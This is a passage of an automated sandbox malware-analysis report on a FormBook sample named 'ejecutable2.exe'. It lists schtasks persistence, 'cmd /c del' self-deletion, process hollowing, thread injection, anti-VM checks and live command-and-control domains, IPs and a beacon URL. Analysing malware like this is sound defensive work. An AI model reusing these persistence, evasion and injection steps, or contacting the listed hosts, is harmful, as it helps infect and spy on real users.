          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamesidebar.EXE.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMsMpRes.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenametwext.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamempr.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameschedsvc.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFDResPub.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFunDisc.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamerpcrt4.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFDPrint.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBASEBRD.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameimageres.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWINMM.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDocumentPerformanceEvents.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWerConCpl.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMSHTML.DLL.MUID vs ejecutable2.exe
          Source: ejecutable2.exe, 00000004.00000002.487824120.0000000000AD0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000004.00000002.486080402.0000000000560000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs ejecutable2.exe
          Source: ejecutable2.exe, 00000004.00000000.422762878.00000000011E4000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUIntPtrTypeIn.exe4 vs ejecutable2.exe
          Source: ejecutable2.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: CmsVPZkxbOtm.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\Desktop\ejecutable2.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\user\Desktop\ejecutable2.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Users\user\Desktop\ejecutable2.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\user\Desktop\ejecutable2.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 76E90000 page execute and read and write
          Source: ejecutable2.exeVirustotal: Detection: 27%
          Source: C:\Users\user\Desktop\ejecutable2.exeFile read: C:\Users\user\Desktop\ejecutable2.exeJump to behavior
          Source: ejecutable2.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\ejecutable2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ......................,.........E.R.R.O.R.:. ...d.......`.......................................................x.%.......................,.....
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ......................,.........E.R.R.O.(.P.....d.......`...............................................................X.................,.....
          Source: unknownProcess created: C:\Users\user\Desktop\ejecutable2.exe 'C:\Users\user\Desktop\ejecutable2.exe'
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\CmsVPZkxbOtm' /XML 'C:\Users\user\AppData\Local\Temp\tmp86AE.tmp'
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess created: C:\Users\user\Desktop\ejecutable2.exe C:\Users\user\Desktop\ejecutable2.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable2.exe'
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\CmsVPZkxbOtm' /XML 'C:\Users\user\AppData\Local\Temp\tmp86AE.tmp'
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess created: C:\Users\user\Desktop\ejecutable2.exe C:\Users\user\Desktop\ejecutable2.exe
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable2.exe'
          Source: C:\Users\user\Desktop\ejecutable2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\ejecutable2.exeFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
          Source: C:\Users\user\Desktop\ejecutable2.exeFile created: C:\Users\user\AppData\Local\Temp\tmp86AE.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/3@7/7
          Source: C:\Users\user\Desktop\ejecutable2.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\ejecutable2.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\ejecutable2.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: ejecutable2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: ejecutable2.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdb source: ejecutable2.exe, 00000004.00000002.487685735.00000000009D0000.00000040.00000001.sdmp, wscript.exe
          Source: Binary string: wscript.pdb source: ejecutable2.exe, 00000004.00000002.486080402.0000000000560000.00000040.00020000.sdmp
          Source: Binary string: wscript.pdbN source: ejecutable2.exe, 00000004.00000002.486080402.0000000000560000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: ejecutable2.exe, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: CmsVPZkxbOtm.exe.0.dr, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.ejecutable2.exe.1120000.0.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.ejecutable2.exe.1120000.2.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.ejecutable2.exe.1120000.5.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 0_2_0033E345 push ss; retn 0033h
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 0_2_048C4649 push esp; ret
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 4_2_0041B87C push eax; ret
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 4_2_0041B812 push eax; ret
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 4_2_0041B81B push eax; ret
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 4_2_00415B53 push ds; ret
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 4_2_00415B1A push ds; ret
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 4_2_00415CE2 push 81CAEFA2h; retf
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0239DFA1 push ecx; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 6.99221568577
          Source: initial sampleStatic PE information: section name: .text entropy: 6.99221568577
          Source: C:\Users\user\Desktop\ejecutable2.exeFile created: C:\Users\user\AppData\Roaming\CmsVPZkxbOtm.exeJump to dropped file

          Boot Survival:

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\CmsVPZkxbOtm' /XML 'C:\Users\user\AppData\Local\Temp\tmp86AE.tmp'

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: /c del 'C:\Users\user\Desktop\ejecutable2.exe'
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: /c del 'C:\Users\user\Desktop\ejecutable2.exe'
          Deletes itself after installationShow sources
          Source: C:\Windows\SysWOW64\cmd.exeFile deleted: c:\users\user\desktop\ejecutable2.exeJump to behavior
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0.2.ejecutable2.exe.262ecec.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.424438137.000000000265F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: ejecutable2.exe PID: 2548, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\ejecutable2.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\ejecutable2.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exeRDTSC instruction interceptor: First address: 0000000000078604 second address: 000000000007860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exeRDTSC instruction interceptor: First address: 000000000007898E second address: 0000000000078994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\ejecutable2.exe TID: 2576Thread sleep time: -31446s >= -30000s
          Source: C:\Users\user\Desktop\ejecutable2.exe TID: 2652Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2572Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\SysWOW64\wscript.exe TID: 2680Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wscript.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 4_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\ejecutable2.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\ejecutable2.exeThread delayed: delay time: 31446
          Source: C:\Users\user\Desktop\ejecutable2.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: ejecutable2.exe, 00000000.00000002.424014627.000000000059F000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000005.00000000.439477133.00000000044E7000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
          Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 4_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wscript.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_023A26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wscript.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\ejecutable2.exeCode function: 4_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\Desktop\ejecutable2.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.branchwallet.com
          Source: C:\Windows\explorer.exeDomain query: www.wwiilive.com
          Source: C:\Windows\explorer.exeNetwork Connect: 5.101.152.161 80
          Source: C:\Windows\explorer.exeNetwork Connect: 35.168.81.157 80
          Source: C:\Windows\explorer.exeNetwork Connect: 3.223.115.185 80
          Source: C:\Windows\explorer.exeDomain query: www.tunetel.com
          Source: C:\Windows\explorer.exeDomain query: www.play-to-escape.com
          Source: C:\Windows\explorer.exeDomain query: www.yhomggsmtdynchb.store
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.222 80
          Source: C:\Windows\explorer.exeDomain query: www.iptechcm.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.pizza-mio.com
          Source: C:\Windows\explorer.exeNetwork Connect: 195.77.116.8 80
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.77 80
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\ejecutable2.exeSection unmapped: C:\Windows\SysWOW64\wscript.exe base address: AB0000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\ejecutable2.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\ejecutable2.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\ejecutable2.exeSection loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\ejecutable2.exeSection loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\ejecutable2.exeMemory written: C:\Users\user\Desktop\ejecutable2.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\ejecutable2.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\ejecutable2.exeThread register set: target process: 1764
          Source: C:\Users\user\Desktop\ejecutable2.exeThread register set: target process: 1764
          Source: C:\Windows\SysWOW64\wscript.exeThread register set: target process: 1764
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\CmsVPZkxbOtm' /XML 'C:\Users\user\AppData\Local\Temp\tmp86AE.tmp'
          Source: C:\Users\user\Desktop\ejecutable2.exeProcess created: C:\Users\user\Desktop\ejecutable2.exe C:\Users\user\Desktop\ejecutable2.exe
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable2.exe'
          Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
          Source: C:\Users\user\Desktop\ejecutable2.exeQueries volume information: C:\Users\user\Desktop\ejecutable2.exe VolumeInformation

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.ejecutable2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.ejecutable2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter1Scheduled Task/Job1Process Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Disable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Information Discovery111VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing12DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion2Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 491547 Sample: ejecutable2.exe Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 38 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 7 other signatures 2->44 9 ejecutable2.exe 1 9 2->9         started        process3 file4 28 C:\Users\user\AppData\Local\...\tmp86AE.tmp, XML 9->28 dropped 30 C:\Users\user\AppData\...\CmsVPZkxbOtm.exe, PE32 9->30 dropped 58 Uses schtasks.exe or at.exe to add and modify task schedules 9->58 60 Tries to detect virtualization through RDTSC time measurements 9->60 62 Injects a PE file into a foreign processes 9->62 13 ejecutable2.exe 9->13         started        16 schtasks.exe 9->16         started        signatures5 process6 signatures7 64 Modifies the context of a thread in another process (thread injection) 13->64 66 Maps a DLL or memory area into another process 13->66 68 Sample uses process hollowing technique 13->68 70 Queues an APC in another process (thread injection) 13->70 18 explorer.exe 13->18 injected process8 dnsIp9 32 play-to-escape.com 81.169.145.77, 49172, 80 STRATOSTRATOAGDE Germany 18->32 34 www.pizza-mio.com 217.160.0.222, 49170, 80 ONEANDONE-ASBrauerstrasse48DE Germany 18->34 36 10 other IPs or domains 18->36 46 System process connects to network (likely due to code injection or exploit) 18->46 22 wscript.exe 18->22         started        signatures10 process11 signatures12 48 Self deletion via cmd delete 22->48 50 Modifies the context of a thread in another process (thread injection) 22->50 52 Maps a DLL or memory area into another process 22->52 54 Tries to detect virtualization through RDTSC time measurements 22->54 25 cmd.exe 22->25         started        process13 signatures14 56 Deletes itself after installation 25->56

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          ejecutable2.exe28%VirustotalBrowse

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.2.ejecutable2.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.pizza-mio.com/u4an/?cRrtMz2=Ea+fIX+qvB9rXsVioouSESAKF/QLNUis3qIxLYsU8whjNSMesV9wMQUCyx2IDzdIrw8QIA==&an=lnlpiVNpa2ntv0%Avira URL Cloudsafe
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.rspb.org.uk/wildlife/birdguide/name/0%Avira URL Cloudsafe
